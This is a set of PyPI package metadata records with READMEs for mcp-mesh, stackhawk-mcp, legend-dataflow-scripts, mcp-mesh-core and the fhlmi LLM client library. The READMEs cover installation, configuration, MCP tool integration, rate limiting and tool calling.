# MCP Mesh Python Runtime Python runtime for the MCP Mesh service mesh framework. ## Installation ```bash pip install mcp-mesh ``` ## Quick Start ```python import mesh # Import types from public API from mesh.types import McpMeshTool # Define your agent @mesh.agent(name="hello-world", http_port=9090) class HelloWorldAgent: """Hello World agent demonstrating MCP Mesh features.""" pass # Create a greeting function with dependency injection @mesh.tool( capability="greeting", dependencies=["date_service"], description="Greeting function with date dependency injection" ) def greet(name: str = "World", date_tool: McpMeshTool = None) -> str: """Greeting function with automatic dependency injection.""" if date_tool is not None: try: current_date = date_tool() return f"Hello, {name}! Today is {current_date}" except Exception: pass return f"Hello, {name}!" # The runtime auto-initializes when you import mesh # Your functions are automatically registered with the mesh registry ``` ## Features - **Automatic Registration**: Functions are automatically registered with the Go registry - **Health Monitoring**: Built-in health checks and heartbeats - **Dependency Injection**: Inject dependencies into your functions - **Service Discovery**: Find and use other services in the mesh - **Graceful Degradation**: Works even if registry is unavailable ## Configuration The runtime can be configured via environment variables: - `MCP_MESH_ENABLED`: Enable/disable runtime (default: "true") - `MCP_MESH_REGISTRY_URL`: Registry URL (default: "http://localhost:8080") - `MCP_MESH_AGENT_NAME`: Custom agent name (auto-generated if not set) ## API Architecture MCP Mesh uses a clear separation between public and private APIs: - **`mesh`** - Public user API for decorators and types - **`_mcp_mesh`** - Private internal implementation (do not import directly) The underscore prefix on `_mcp_mesh` follows Python conventions to indicate internal/private packages.
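The environment-variable configuration described in the Configuration section can be pictured with a small sketch. This is illustrative only — it is not mcp-mesh's internal code, just the documented variables and their defaults:

```python
import os

def runtime_config() -> dict:
    """Read the documented MCP Mesh env vars with their defaults (illustrative sketch)."""
    return {
        "enabled": os.environ.get("MCP_MESH_ENABLED", "true").lower() == "true",
        "registry_url": os.environ.get("MCP_MESH_REGISTRY_URL", "http://localhost:8080"),
        # None here means the runtime would auto-generate an agent name
        "agent_name": os.environ.get("MCP_MESH_AGENT_NAME"),
    }

cfg = runtime_config()
```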
Users should only import from the `mesh` package to ensure compatibility across versions. ## Documentation See the [main repository](https://github.com/dhyansraj/mcp-mesh) for complete documentation.
text/markdown
null
MCP Mesh Contributors <noreply@mcp-mesh.dev>
null
null
MIT
agents, ai, distributed, kubernetes, mcp, microservices, orchestration
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Pytho...
[]
null
null
>=3.11
[]
[]
[]
[ "aiohttp<4.0.0,>=3.8.0", "cachetools>=5.3.0", "click<9.0.0,>=8.1.0", "fastapi<1.0.0,>=0.104.0", "fastmcp<3.0.0,>=2.8.0", "httpx<1.0.0,>=0.25.0", "jinja2>=3.1.0", "litellm>=1.30.0", "mcp-mesh-core>=0.9.6", "mcp<2.0.0,>=1.9.0", "prometheus-client<1.0.0,>=0.19.0", "pydantic<3.0.0,>=2.4.0", "pyt...
[]
[]
[]
[ "Homepage, https://github.com/dhyansraj/mcp-mesh", "Documentation, https://mcp-mesh.ai/", "Repository, https://github.com/dhyansraj/mcp-mesh", "Issues, https://github.com/dhyansraj/mcp-mesh/issues", "Discussions, https://github.com/dhyansraj/mcp-mesh/discussions" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:21:17.231221
mcp_mesh-0.9.6.tar.gz
185,474
c8/31/285bcbdd893db6d56e0ba06ca99b7389dfb619a84523305900d687e95f78/mcp_mesh-0.9.6.tar.gz
source
sdist
null
false
8a336d1a8d5e733e5fbb297bc1470df0
5f6ea46ae13e3a973963fb269563d0444f1cf299afa8d7c3a915c84786136711
c831285bcbdd893db6d56e0ba06ca99b7389dfb619a84523305900d687e95f78
null
[ "LICENSE" ]
259
2.4
stackhawk-mcp
1.2.1
StackHawk MCP Server for Security Analytics and Developer Integration
# StackHawk MCP Server **Current Version: 1.2.1** _Requires Python 3.10 or higher_ A Model Context Protocol (MCP) server for integrating with StackHawk's security scanning platform. Provides security analytics, YAML configuration management, sensitive data/threat surface analysis, and anti-hallucination tools for LLMs. --- ## Table of Contents - [Features](#features) - [Installation](#installation) - [Usage](#usage) - [Configuration](#configuration) - [Available Tools & API](#available-tools--api) - [YAML & Anti-Hallucination](#yaml--anti-hallucination) - [Sensitive Data & Threat Surface](#sensitive-data--threat-surface) - [Testing & Development](#testing--development) - [Example Configurations](#example-configurations) - [Contributing](#contributing) - [License](#license) - [Integrating with LLMs and IDEs](#integrating-with-llms-and-ides) --- ## Features - **Security Analytics:** Organization, application, and vulnerability tools - **YAML Configuration Tools:** Creation, validation, schema reference, anti-hallucination field validation - **Sensitive Data & Threat Surface Analysis:** Repository, application, and data exposure mapping - **Custom User-Agent:** All API calls include a versioned `User-Agent` header - **Comprehensive Test Suite:** Automated tests for all major features --- ## Installation 1. **Install via pip (make sure you have write permission to your current python environment):** ```bash > pip install stackhawk-mcp # Requires Python 3.10 or higher ``` **Or Install via pip in a virtual env:** ```bash > python3 -m venv ~/.virtualenvs/mcp > source ~/.virtualenvs/mcp/bin/activate > (mcp) pip install stackhawk-mcp # Requires Python 3.10 or higher ``` **Or Install via pip using pyenv:** ```bash > pyenv shell 3.10.11 > pip install stackhawk-mcp # Requires Python 3.10 or higher ``` **Or Install locally from this repo:** ```bash > pip install --user . # Run this command from the root of the cloned repository ``` 2. 
**Set your StackHawk API key:** ```bash > export STACKHAWK_API_KEY="your-api-key-here" ``` --- ## Usage ### Running the MCP Server ```bash python -m stackhawk_mcp.server ``` ### Running the HTTP Server (FastAPI) ```bash python -m stackhawk_mcp.http_server ``` ### Running Tests ```bash pytest ``` ### Integrating with LLMs and IDEs StackHawk MCP can be used as a tool provider for AI coding assistants and LLM-powered developer environments, enabling security analytics, YAML validation, and anti-hallucination features directly in your workflow. #### Cursor (AI Coding Editor) - **Setup:** - Follow the installation instructions above to install `stackhawk-mcp` in your python environment. - In Cursor, go to `Cursor Settings->Tools & Integrations->MCP Tools` - Add a "New MCP Server" with the following json, depending on your setup: - Using a virtual env at `~/.virtualenvs/mcp`: ```json { "mcpServers": { "stackhawk": { "command": "/home/bobby/.virtualenvs/mcp/bin/python", "args": ["-m", "stackhawk_mcp.server"], "env": { "STACKHAWK_API_KEY": "${env:STACKHAWK_API_KEY}" }, "disabled": false } } } ``` - Using pyenv: ```json { "mcpServers": { "stackhawk": { "command": "/home/bobby/.pyenv/versions/3.10.11/bin/python3", "args": ["-m", "stackhawk_mcp.server"], "env": { "STACKHAWK_API_KEY": "${env:STACKHAWK_API_KEY}" }, "disabled": false } } } ``` - Or use python directly: ```json { "mcpServers": { "stackhawk": { "command": "python3", "args": ["-m", "stackhawk_mcp.server"], "env": { "STACKHAWK_API_KEY": "${env:STACKHAWK_API_KEY}" } } } } ``` - Then make sure the "stackhawk" MCP Tool is enabled - **Usage:** - Use Cursor's tool invocation to call StackHawk MCP tools (e.g., vulnerability search, YAML validation). - Example prompt: `Validate this StackHawk YAML config for errors.` #### OpenAI, Anthropic, and Other LLMs - **Setup:** - Deploy the MCP HTTP server and expose it to your LLM system (local or cloud). 
- Use the LLM's tool-calling or function-calling API to connect to the MCP endpoint. - Pass the required arguments (e.g., org_id, yaml_content) as specified in the tool schemas. - **Example API Call:** ```json { "method": "tools/call", "params": { "name": "validate_stackhawk_config", "arguments": {"yaml_content": "..."} } } ``` - **Best Practices:** - Use anti-hallucination tools to validate field names and schema compliance. - Always check the tool's output for warnings or suggestions. #### IDEs like Windsurf - **Setup:** - Add StackHawk MCP as a tool provider or extension in your IDE, pointing to the local or remote MCP server endpoint. - Configure environment variables as needed. - **Usage:** - Invoke security analytics, YAML validation, or sensitive data tools directly from the IDE's command palette or tool integration panel. #### General Tips - Ensure the MCP server is running and accessible from your LLM or IDE environment. - Review the [Available Tools & API](#available-tools--api) section for supported operations. - For advanced integration, see the example tool usage in this README or explore the codebase for custom workflows. ### GitHub Copilot Agents StackHawk can be added to the GitHub Coding Agent as an MCP server or as its own GitHub Custom Agent. #### Add to GitHub Coding Agent You can add StackHawk MCP to the GitHub Copilot Coding Agent. This gives the agent all the `stackhawk/` tools. 
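Before wiring up any of these integrations, it can help to see what a raw MCP tool invocation looks like on the wire. A minimal sketch of serializing the `tools/call` request shown in the example API call above — the helper is hypothetical, not part of `stackhawk-mcp`:

```python
import json

def tools_call(name: str, arguments: dict) -> str:
    """Serialize an MCP tools/call request like the example above (sketch, not a full JSON-RPC envelope)."""
    return json.dumps({"method": "tools/call", "params": {"name": name, "arguments": arguments}})

payload = tools_call("validate_stackhawk_config", {"yaml_content": "app:\n  env: dev\n"})
```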
**StackHawk MCP installation into the Coding Agent** [General instructions on GitHub](https://docs.github.com/en/copilot/how-tos/use-copilot-agents/coding-agent/extend-coding-agent-with-mcp#adding-an-mcp-configuration-to-your-repository) For StackHawk MCP, the MCP Configuration JSON should look something like this: ```json { "mcpServers": { "stackhawk": { "type": "local", "tools": [ "*" ], "command": "uvx", "args": [ "stackhawk-mcp" ], "env": { "STACKHAWK_API_KEY": "COPILOT_MCP_STACKHAWK_API_KEY" } } } } ``` Then in the Repository's `Settings->Environments->copilot->Environment Secrets`, add `COPILOT_MCP_STACKHAWK_API_KEY` with your StackHawk API Key. [Installation verification instructions](https://docs.github.com/en/copilot/how-tos/use-copilot-agents/coding-agent/extend-coding-agent-with-mcp#validating-your-mcp-configuration) #### StackHawk Onboarding Agent as a GitHub Copilot Custom Agent You can add the StackHawk Onboarding Agent as a custom agent at the enterprise, organization, or repository level in GitHub. When added, the StackHawk Onboarding Agent becomes a selectable option in the Copilot Agent Chat with context to help with onboarding, plus it installs `stackhawk-mcp` so the agent has access to all of those tools. **StackHawk Onboarding Agent installation** The general approach is to take the [StackHawk Onboarding Agent definition](https://github.com/github/awesome-copilot/blob/main/agents/stackhawk-security-onboarding.agent.md) and apply it to either the desired repository, enterprise, or organization in GitHub. 
- [Instructions for installing into a repository on GitHub](https://docs.github.com/en/enterprise-cloud@latest/copilot/how-tos/use-copilot-agents/coding-agent/create-custom-agents#creating-a-custom-agent-profile-for-a-repository) - [Instructions for installing into an enterprise on GitHub](https://docs.github.com/en/enterprise-cloud@latest/copilot/how-tos/administer-copilot/manage-for-enterprise/manage-agents/prepare-for-custom-agents) - [Instructions for installing into an organization on GitHub](https://docs.github.com/en/enterprise-cloud@latest/copilot/how-tos/administer-copilot/manage-for-organization/prepare-for-custom-agents) Note that the `mcp-servers` block in the StackHawk Onboarding Agent definition references an environment variable called `COPILOT_MCP_STACKHAWK_API_KEY`. Go to the Repository's `Settings->Environments->copilot->Environment Secrets` and add `COPILOT_MCP_STACKHAWK_API_KEY` with your StackHawk API Key. --- ## Configuration - All HTTP requests include a custom `User-Agent` header: ``` User-Agent: StackHawk-MCP/{version} ``` - The version is set in `stackhawk_mcp/server.py` as `STACKHAWK_MCP_VERSION`. - Set your API key via the `STACKHAWK_API_KEY` environment variable. 
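The versioned `User-Agent` convention above can be sketched as follows. The version constant is hard-coded here purely for illustration — in practice it is defined as `STACKHAWK_MCP_VERSION` in `stackhawk_mcp/server.py`:

```python
STACKHAWK_MCP_VERSION = "1.2.1"  # illustrative; the real value lives in stackhawk_mcp/server.py

def build_user_agent(version: str = STACKHAWK_MCP_VERSION) -> str:
    """Format the versioned User-Agent header that every API call carries."""
    return f"StackHawk-MCP/{version}"
```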
--- ## Available Tools & API ### Security Analytics - **Organization Info:** Get details about StackHawk organizations - **Application Management:** List/search applications with security status - **Vulnerability Search:** Search for vulnerabilities across applications - **Security Dashboard:** Generate executive dashboards - **Vulnerability Reporting:** Generate detailed reports and analysis - **Trend Analysis:** Analyze vulnerability trends - **Critical Findings:** Get high-priority findings - **Executive Summaries:** Generate executive-level summaries ### YAML Configuration Management - **Create Config:** Generate StackHawk YAML config files - **Validate Config:** Validate YAML against the official schema - **Schema Reference:** Fetch the latest StackHawk schema - **Schema Caching:** 24-hour TTL, manual refresh - **Anti-Hallucination:** Field validation tools ### Sensitive Data & Threat Surface - **Sensitive Data Reporting:** Organization, app, and repo-level - **Trend Analysis:** Track sensitive data exposure - **Critical Data Findings:** Identify high-risk data - **Surface Mapping:** Map sensitive data and threat surfaces ### Example Tool Usage ```python # Get organization info org_info = await server._get_organization_info(org_id="your-org-id") # Validate a YAML config result = await server._validate_stackhawk_config(yaml_content="...") # Get application vulnerabilities vulns = await server._get_application_vulnerabilities(app_id="your-app-id") ``` --- ## YAML & Anti-Hallucination - **Field Validation:** Prevents LLMs from suggesting invalid fields - **Schema Reference:** Always up-to-date with the official StackHawk schema - **AI Suggestions:** Use `suggest_configuration` for YAML recommendations - **YAML Validation:** Validate any config with `validate_stackhawk_config` **Official Schema URL:** [https://download.stackhawk.com/hawk/jsonschema/hawkconfig.json](https://download.stackhawk.com/hawk/jsonschema/hawkconfig.json) --- ## Sensitive Data & Threat 
Surface - **Data Type Categorization:** PII, PCI, PHI - **Risk Assessment:** Risk scoring, levels, and factors - **Exposure Mapping:** Application and repository analysis - **Trend Analysis:** Time-based, app, repo, and data type trends - **Surface Mapping:** Entry points, risk heatmap, exposure analysis --- ## Testing & Development ### Running All Tests ```bash pytest ``` ### Running Individual Tests ```bash pytest tests/test_sensitive_data.py pytest tests/test_repository_analysis.py ``` ### Code Formatting ```bash black stackhawk_mcp/ ``` ### Type Checking ```bash mypy stackhawk_mcp/ ``` --- ## Example Configurations ### Basic Configuration ```yaml app: applicationId: "12345678-1234-1234-1234-123456789012" env: "dev" host: "http://localhost:3000" name: "Development App" description: "Local development environment" ``` ### Production Configuration with Authentication ```yaml app: applicationId: "87654321-4321-4321-4321-210987654321" env: "prod" host: "https://myapp.com" name: "Production App" description: "Production environment" authentication: type: "form" username: "your-username" password: "your-password" loginUrl: "https://myapp.com/login" usernameField: "username" passwordField: "password" hawk: spider: base: true ajax: false maxDurationMinutes: 30 scan: maxDurationMinutes: 60 threads: 10 startupTimeoutMinutes: 5 failureThreshold: "high" tags: - name: "environment" value: "production" - name: "application" value: "myapp" ``` --- ## Contributing Contributions are welcome! Please open issues or pull requests for bug fixes, new features, or documentation improvements. --- ## License Apache License 2.0. See [LICENSE](LICENSE) for details. ## Release and Version Bumping Version bumps are managed via the "Prepare Release" GitHub Actions workflow. When triggering this workflow, you can select whether to bump the minor or major version. The workflow will automatically update version files, commit, and push the changes to main. 
> **Note:** The workflow is protected against infinite loops caused by automated version bump commits. ## GitHub Actions Authentication All CI/CD git operations use a GitHub App token for authentication. The git user and email are set from the repository secrets `HAWKY_APP_USER` and `HAWKY_APP_USER_EMAIL`. ## Workflow Protections Workflows are designed to skip jobs if the latest commit is an automated version bump, preventing workflow loops. ## How to Trigger a Release 1. Go to the "Actions" tab on GitHub. 2. Select the "Prepare Release" workflow. 3. Click "Run workflow" and choose the desired bump type (minor or major). 4. The workflow will handle the rest! <!-- mcp-name: com.stackhawk/stackhawk -->
text/markdown
null
"StackHawk, Inc." <support@stackhawk.com>
null
null
null
null
[]
[]
null
null
>=3.10
[]
[]
[]
[ "mcp>=1.0.0", "httpx>=0.27.0", "python-dotenv>=1.0.0", "PyYAML>=6.0", "jsonschema>=4.0.0", "pytest>=7.0.0; extra == \"dev\"", "pytest-asyncio>=0.21.0; extra == \"dev\"", "black>=23.0.0; extra == \"dev\"", "mypy>=1.0.0; extra == \"dev\"" ]
[]
[]
[]
[ "Homepage, https://github.com/stackhawk/stackhawk-mcp", "Repository, https://github.com/stackhawk/stackhawk-mcp" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:21:01.903370
stackhawk_mcp-1.2.1.tar.gz
45,921
d8/d6/72a206eba31248f5534496023edac14ceabae6ab34ea0f1a09f2854c689e/stackhawk_mcp-1.2.1.tar.gz
source
sdist
null
false
55b25de0dc52d3d7a343d9849bad620a
17bbd1652eef9e85abd9a5bc877faa3d9e9054aca1e62b1bcb2fa58fac25afd4
d8d672a206eba31248f5534496023edac14ceabae6ab34ea0f1a09f2854c689e
Apache-2.0
[ "LICENSE" ]
270
2.4
legend-dataflow-scripts
0.3.0a4
Python package for the processing scripts for LEGEND-200 data
# LEGEND dataflow scripts [![PyPI](https://img.shields.io/pypi/v/legend-dataflow-scripts?logo=pypi)](https://pypi.org/project/legend-dataflow-scripts/) ![GitHub tag (latest by date)](https://img.shields.io/github/v/tag/legend-exp/legend-dataflow-scripts?logo=git) [![GitHub Workflow Status](https://img.shields.io/github/checks-status/legend-exp/legend-dataflow-scripts/main?label=main%20branch&logo=github)](https://github.com/legend-exp/legend-dataflow-scripts/actions) [![pre-commit](https://img.shields.io/badge/pre--commit-enabled-brightgreen?logo=pre-commit&logoColor=white)](https://github.com/pre-commit/pre-commit) [![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black) [![Codecov](https://img.shields.io/codecov/c/github/legend-exp/legend-dataflow-scripts?logo=codecov)](https://app.codecov.io/gh/legend-exp/legend-dataflow-scripts) ![GitHub issues](https://img.shields.io/github/issues/legend-exp/legend-dataflow-scripts?logo=github) ![GitHub pull requests](https://img.shields.io/github/issues-pr/legend-exp/legend-dataflow-scripts?logo=github) ![License](https://img.shields.io/github/license/legend-exp/legend-dataflow-scripts) [![Read the Docs](https://img.shields.io/readthedocs/legend-dataflow-scripts?logo=readthedocs)](https://legend-dataflow-scripts.readthedocs.io) Scripts used in the LEGEND data processing. These scripts are general enough to also be used in test-stand processing.
text/markdown
null
George Marshall <ggmarsh@uw.edu>, Luigi Pertoldi <gipert@pm.me>
The LEGEND Collaboration
null
null
null
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "Intended Audience :: Science/Research", "License :: OSI Approved :: MIT License", "Operating System :: MacOS", "Operating System :: POSIX", "Operating System :: Unix", "Programming Language :: Python", "Programming Language :: Pyt...
[]
null
null
>=3.11
[]
[]
[]
[ "colorlog", "dbetto>=1.2.3", "pygama>=2.3.0a1", "dspeed>=2.0", "pylegendmeta>=1.2.5", "legend-pydataobj>=1.16", "pip", "legend-dataflow-scripts; extra == \"test\"", "pytest>=6; extra == \"test\"", "pytest-cov>=3; extra == \"test\"", "legend-dataflow-scripts[test]; extra == \"dev\"", "pre-commi...
[]
[]
[]
[]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:20:53.592491
legend_dataflow_scripts-0.3.0a4.tar.gz
47,981
0e/ac/1c23f3c949e6ed2b661758e9488045a2a807e708315fe18e0bc8e8838e92/legend_dataflow_scripts-0.3.0a4.tar.gz
source
sdist
null
false
ab53a807f5b623336e55e545d97cc7d0
3faa28ea21f9d8d7ce30cda77240c756f56d470a81c81a2503dfbaa94c4301d3
0eac1c23f3c949e6ed2b661758e9488045a2a807e708315fe18e0bc8e8838e92
null
[]
200
2.4
mcp-mesh-core
0.9.6
Rust core runtime for MCP Mesh agents
# MCP Mesh Core Rust core runtime for MCP Mesh agents. This library handles: - Agent startup and registration - Heartbeat loop (fast HEAD + conditional POST) - Topology management and change detection - Event streaming to language SDKs ## Building ```bash # Install maturin pip install maturin # Build and install in development mode maturin develop # Build release wheel maturin build --release ``` ## Usage from Python ```python from mcp_mesh_core import AgentSpec, start_agent # Create agent specification spec = AgentSpec( name="my-agent", version="1.0.0", registry_url="http://localhost:8100", http_port=9000, capabilities=[...], dependencies=[...], ) # Start agent (returns handle) handle = start_agent(spec) # Listen for topology events async def event_loop(): while True: event = await handle.next_event() print(f"Event: {event.event_type}") ``` ## Architecture ``` Python SDK Rust Core ─────────────────────────────────────────── Decorators → Metadata collection → AgentSpec ↓ start_agent() ↓ AgentRuntime ├─ HeartbeatLoop ├─ RegistryClient └─ TopologyManager ↓ Event listener ← EventStream DI updates ← MeshEvent ```
text/markdown; charset=UTF-8; variant=GFM
null
MCP Mesh Contributors <noreply@mcp-mesh.dev>
null
null
MIT
null
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Programming Language :: Rust", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3...
[]
null
null
>=3.11
[]
[]
[]
[]
[]
[]
[]
[ "Homepage, https://github.com/dhyansraj/mcp-mesh", "Issues, https://github.com/dhyansraj/mcp-mesh/issues", "Repository, https://github.com/dhyansraj/mcp-mesh" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:20:50.719621
mcp_mesh_core-0.9.6-cp314-cp314-win_amd64.whl
2,396,534
ed/c7/f434a5d7cf5df6caf2bbc6fc548354a1cbba78881d2edfd0a9b8271a353b/mcp_mesh_core-0.9.6-cp314-cp314-win_amd64.whl
cp314
bdist_wheel
null
false
17c622e06eb61d093fef202dec6464cd
b2738b912dbc969401eb4bc1a0dcfc2c29eaf3ff10e2dcd04c3c42136706d602
edc7f434a5d7cf5df6caf2bbc6fc548354a1cbba78881d2edfd0a9b8271a353b
null
[]
1,378
2.4
fhlmi
0.44.0
A client to provide LLM responses for FutureHouse applications.
# Language Model Interface (LMI) <!-- pyml disable-num-lines 6 line-length --> [![GitHub](https://img.shields.io/badge/github-%23121011.svg?style=for-the-badge&logo=github&logoColor=white)](https://github.com/Future-House/ldp/tree/main/packages/lmi) [![PyPI version](https://badge.fury.io/py/fhlmi.svg)](https://badge.fury.io/py/fhlmi) [![tests](https://github.com/Future-House/ldp/actions/workflows/tests.yml/badge.svg)](https://github.com/Future-House/ldp/tree/main/packages/lmi) ![License](https://img.shields.io/badge/License-Apache_2.0-blue.svg) ![PyPI Python Versions](https://img.shields.io/pypi/pyversions/fhlmi) A Python library for interacting with Large Language Models (LLMs) through a unified interface, hence the name Language Model Interface (LMI). ## Installation ```bash pip install fhlmi ``` <!--TOC--> --- **Table of Contents** - [Installation](#installation) - [Quick start](#quick-start) - [Documentation](#documentation) - [LLMs](#llms) - [LLMModel](#llmmodel) - [LiteLLMModel](#litellmmodel) - [Cost tracking](#cost-tracking) - [Rate limiting](#rate-limiting) - [Basic Usage](#basic-usage) - [Rate Limit Format](#rate-limit-format) - [Storage Options](#storage-options) - [Monitoring Rate Limits](#monitoring-rate-limits) - [Timeout Configuration](#timeout-configuration) - [Weight-based Rate Limiting](#weight-based-rate-limiting) - [Tool calling](#tool-calling) - [Vertex](#vertex) - [Embedding models](#embedding-models) - [LiteLLMEmbeddingModel](#litellmembeddingmodel) - [HybridEmbeddingModel](#hybridembeddingmodel) - [SentenceTransformerEmbeddingModel](#sentencetransformerembeddingmodel) --- <!--TOC--> ## Quick start A simple example of how to use the library with default settings is shown below. 
```python from lmi import LiteLLMModel from aviary.core import Message llm = LiteLLMModel() messages = [Message(content="What is the meaning of life?")] result = await llm.call_single(messages) # assert result.text == "42" ``` or, if you only have one user message, just: ```python from lmi import LiteLLMModel llm = LiteLLMModel() result = await llm.call_single("What is the meaning of life?") # assert result.text == "42" ``` ## Documentation ### LLMs An LLM is a class that inherits from `LLMModel` and implements the following methods: - `async acompletion(messages: list[Message], **kwargs) -> list[LLMResult]` - `async acompletion_iter(messages: list[Message], **kwargs) -> AsyncIterator[LLMResult]` These methods are used by the base class `LLMModel` to implement the LLM interface. Because `LLMModel` is an abstract class, it doesn't depend on any specific LLM provider. All communication with the provider happens in the subclasses, using `acompletion` and `acompletion_iter` as interfaces. Because these are the only methods that communicate with the chosen LLM provider, we use an abstraction [LLMResult](https://github.com/Future-House/ldp/blob/main/packages/lmi/src/lmi/types.py#L35) to hold the results of the LLM call. #### LLMModel An `LLMModel` implements `call`, which receives a list of `aviary` `Message`s and returns a list of `LLMResult`s. `LLMModel.call` can receive callbacks, tools, and output schemas to control its behavior, as explained in more detail below. Because we support interacting with the LLMs using `Message` objects, we can use the modalities available in `aviary`, which currently include text and images. `lmi` supports these modalities but does not support other modalities yet. Additionally, `LLMModel.call_single` can be used to return a single `LLMResult` completion. #### LiteLLMModel `LiteLLMModel` wraps `LiteLLM` API usage within our `LLMModel` interface. 
It receives a `name` parameter (the name of the model to use) and a `config` parameter, which is a dictionary of configuration options for the model following the [LiteLLM configuration schema](https://docs.litellm.ai/docs/routing). Common parameters such as `temperature`, `max_tokens`, and `n` (the number of completions to return) can be passed as part of the `config` dictionary.

```python
import os

from lmi import LiteLLMModel

config = {
    "model_list": [
        {
            "model_name": "gpt-4o",
            "litellm_params": {
                "model": "gpt-4o",
                "api_key": os.getenv("OPENAI_API_KEY"),
                "frequency_penalty": 1.5,
                "top_p": 0.9,
                "max_tokens": 512,
                "temperature": 0.1,
                "n": 5,
            },
        }
    ]
}

llm = LiteLLMModel(name="gpt-4o", config=config)
```

`config` can also be used to pass common parameters directly for the model.

```python
from lmi import LiteLLMModel

config = {
    "name": "gpt-4o",
    "temperature": 0.1,
    "max_tokens": 512,
    "n": 5,
}

llm = LiteLLMModel(config=config)
```

### Cost tracking

Cost tracking is supported in two different ways:

1. Calls to the LLM return the token usage for each call in `LLMResult.prompt_count` and `LLMResult.completion_count`. Additionally, `LLMResult.cost` can be used to get a cost estimate for the call in USD.
2. A global cost tracker is maintained in `GLOBAL_COST_TRACKER` and can be enabled or disabled using `enable_cost_tracking()` and `cost_tracking_ctx()`.

### Rate limiting

Rate limiting helps regulate the usage of resources across various services and LLMs. The rate limiter supports both in-memory and Redis-based storage for cross-process rate limiting. Currently, `lmi` takes into account the tokens used (Tokens per Minute, TPM) and the requests handled (Requests per Minute, RPM).

#### Basic Usage

Rate limits can be configured in two ways:

1. Through the LLM configuration:

   ```python
   from lmi import LiteLLMModel

   config = {
       "rate_limit": {
           "gpt-4": "100/minute",  # 100 tokens per minute
       },
       "request_limit": {
           "gpt-4": "5/minute",  # 5 requests per minute
       },
   }

   llm = LiteLLMModel(name="gpt-4", config=config)
   ```

   With `rate_limit` we limit only token consumption, and with `request_limit` we limit only request volume. You can configure both, or only one, as needed.

2. Through the global rate limiter configuration:

   ```python
   from lmi.rate_limiter import GLOBAL_LIMITER

   GLOBAL_LIMITER.rate_config[("client", "gpt-4")] = "100/minute"  # tokens per minute
   GLOBAL_LIMITER.rate_config[("client|request", "gpt-4")] = "5/minute"  # requests per minute
   ```

   With `client` we limit only token consumption, and with `client|request` we limit only request volume. You can configure both, or only one, as needed.

#### Rate Limit Format

Rate limits can be specified in two formats:

1. As a string: `"<count> [per|/] [n (optional)] <second|minute|hour|day|month|year>"`

   ```python
   "100/minute"  # 100 tokens per minute
   "5 per second"  # 5 tokens per second
   "1000/day"  # 1000 tokens per day
   ```

2. Using `RateLimitItem` classes:

   ```python
   from limits import RateLimitItemPerMinute, RateLimitItemPerSecond

   RateLimitItemPerSecond(30, 1)  # 30 tokens per second
   RateLimitItemPerMinute(1000, 1)  # 1000 tokens per minute
   ```

#### Storage Options

The rate limiter supports two storage backends:

1. In-memory storage (default when Redis is not configured):

   ```python
   from lmi.rate_limiter import GlobalRateLimiter

   limiter = GlobalRateLimiter(use_in_memory=True)
   ```

2. Redis storage (for cross-process rate limiting):

   ```python
   # Set the REDIS_URL environment variable
   import os

   os.environ["REDIS_URL"] = "localhost:6379"

   from lmi.rate_limiter import GlobalRateLimiter

   limiter = GlobalRateLimiter()  # Will automatically use Redis if REDIS_URL is set
   ```

This `limiter` can be used within the `LLMModel.check_rate_limit` method to check the rate limit before making a request, similarly to how it is done in the [`LiteLLMModel` class][1].

[1]: https://github.com/Future-House/ldp/blob/18138af155bef7686d1eb2b486edbc02d62037eb/packages/lmi/src/lmi/llms.py

#### Monitoring Rate Limits

You can monitor the current rate limit status:

```python
from aviary.core import Message
from lmi import LiteLLMModel
from lmi.rate_limiter import GLOBAL_LIMITER

config = {
    "rate_limit": {
        "gpt-4": "100/minute",  # 100 tokens per minute
    },
    "request_limit": {
        "gpt-4": "5/minute",  # 5 requests per minute
    },
}

llm = LiteLLMModel(name="gpt-4", config=config)
results = await llm.call([Message(content="Hello, world!")])  # Consume some tokens

status = await GLOBAL_LIMITER.rate_limit_status()
# Example output:
# {
#     ("client|request", "gpt-4"): {  # the limit status for requests
#         "period_start": 1234567890,
#         "n_items_in_period": 1,
#         "period_seconds": 60,
#         "period_name": "minute",
#         "period_cap": 5,
#     },
#     ("client", "gpt-4"): {  # the limit status for tokens
#         "period_start": 1234567890,
#         "n_items_in_period": 50,
#         "period_seconds": 60,
#         "period_name": "minute",
#         "period_cap": 100,
#     },
# }
```

#### Timeout Configuration

The default timeout for rate limiting is 60 seconds, but it can be configured:

```python
import os

os.environ["RATE_LIMITER_TIMEOUT"] = "30"  # 30-second timeout
```

#### Weight-based Rate Limiting

Rate limits can account for different weights (e.g., token counts for LLM requests):

```python
await GLOBAL_LIMITER.try_acquire(
    ("client", "gpt-4"),
    weight=token_count,  # Number of tokens in the request
    acquire_timeout=30.0,  # Optional timeout override
)
```

### Tool calling

LMI supports
function calling through tools, which are functions the LLM can invoke. Tools are passed to `LLMModel.call` or `LLMModel.call_single` as a list of [`Tool` objects from `aviary`][2], along with an optional `tool_choice` parameter that controls how the LLM uses these tools.

[2]: https://github.com/Future-House/aviary/blob/1a50b116fb317c3ef27b45ea628781eb53c0b7ae/src/aviary/tools/base.py#L334

The `tool_choice` parameter follows `OpenAI`'s definition. It can be:

| Tool Choice Value               | Constant                           | Behavior                                                                       |
| ------------------------------- | ---------------------------------- | ------------------------------------------------------------------------------ |
| `"none"`                        | `LLMModel.NO_TOOL_CHOICE`          | The model will not call any tools and instead generates a message              |
| `"auto"`                        | `LLMModel.MODEL_CHOOSES_TOOL`      | The model can choose between generating a message or calling one or more tools |
| `"required"`                    | `LLMModel.TOOL_CHOICE_REQUIRED`    | The model must call one or more tools                                          |
| A specific `aviary.Tool` object | N/A                                | The model must call this specific tool                                         |
| `None`                          | `LLMModel.UNSPECIFIED_TOOL_CHOICE` | No tool choice preference is provided to the LLM API                           |

